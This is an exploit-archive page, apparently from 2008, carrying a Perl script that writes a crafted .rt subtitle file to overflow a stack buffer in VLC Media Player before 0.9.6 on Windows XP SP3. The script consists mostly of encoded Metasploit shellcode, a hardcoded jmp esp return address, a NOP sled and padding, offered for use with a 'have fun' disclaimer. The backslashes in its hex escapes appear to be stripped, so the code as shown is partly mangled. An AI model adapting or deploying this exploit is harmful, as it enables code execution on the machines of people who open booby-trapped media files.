VLC Media Player < 0.9.6 .RT Stack Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC Media Player < 0.9.6 .RT Stack Buffer Overflow Exploit
# Published : 2008-11-07
# Author : SkD
# Previous Title : Sudo <= 1.6.9p18 (Defaults setenv) Local Privilege Escalation Exploit
# Next Title : Anti-Keylogger Elite 3.3.0 (AKEProtect.sys) Privilege Escalation Exploit

#!/usr/bin/perl
# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based)
# ---------------------------------------------------------------
# Exploit by SkD <skdrat@hotmail.com>
#
# This should work on a fully up-to-date Windows XP SP3. If you want it to work
# on your OS version, just find a "jmp esp" address in one of the dlls loaded
# with VLC :).
# Have fun.  Remember that VLC will open the file .rt automatically with a video
# of the same name (example: s.mov with s.rt in the same folder).
# Credits to Tobias Klein.
# Author has no responsibility over the damage you do with this!

use strict; use warnings;
# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32".
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d".
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c".
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45".
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36".
"x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e".
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a".
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d".
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74".
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57".
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38".
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b".
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77".
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b".
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53".
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f".
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31".
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50".
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37".
"x70x41";
my $char = "x41";
my $nop = "x90";
my $eip = "xd7x30x9dx7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)
my $jmp = "xebx06xFFxFF";
my $addr =  "xb5xb5xfdx7f";
open(my $rt, "> s.rt");
print $rt  "x3Cx77x69x6Ex64x6Fx77x20x68x65".
	     "x69x67x68x74x3Dx22x32x35x30x22".
             "x20x77x69x64x74x68x3Dx22x33x30".
             "x30x22x20x64x75x72x61x74x69x6F".
             "x6Ex3Dx22x31x35x22x20x62x67x63".
             "x6Fx6Cx6Fx72x3Dx22x79x65x6Cx6C".
             "x6Fx77x22x3Ex0Dx0Ax4Dx61x72x79".
             "x20x68x61x64x20x61x20x6Cx69x74".
             "x74x6Cx65x20x6Cx61x6Dx62x2Cx0D".
             "x0Ax3Cx62x72x2Fx3Ex3Cx74x69x6D".
             "x65x20x62x65x67x69x6Ex3Dx22".
             $char x 72 . $eip . $jmp . $addr .  $nop x 12 .
             $shellcode . $char x 1024 .
             "x22x2Fx3Ex0Dx0Ax3Cx62x72x2Fx3E".
             "x3Cx74x69x6Dx65x20x62x65x67x69".
             "x6Ex3Dx22x36x22x2Fx3Ex6Cx69x74".
             "x74x6Cx65x20x6Cx61x6Dx62x2Cx0D".
             "x0Ax3Cx62x72x2Fx3Ex3Cx74x69x6D".
             "x65x20x62x65x67x69x6Ex3Dx22x39".
             "x22x2Fx3Ex4Dx61x72x79x20x68x61".
             "x64x20x61x20x6Cx69x74x74x6Cx65".
             "x20x6Cx61x6Dx62x0Dx0Ax3Cx62x72".
             "x2Fx3Ex3Cx74x69x6Dx65x20x62x65".
             "x67x69x6Ex3Dx22x31x32x22x2Fx3E".
             "x77x68x6Fx73x65x20x66x6Cx65x65".
             "x63x65x20x77x61x73x20x77x68x69".
             "x74x65x20x61x73x20x73x6Ex6Fx77".
             "x2Ex0Dx0Ax3Cx2Fx77x69x6Ex64x6F".
             "x77x3Ex0Dx0A";

# www.Syue.com [2008-11-07]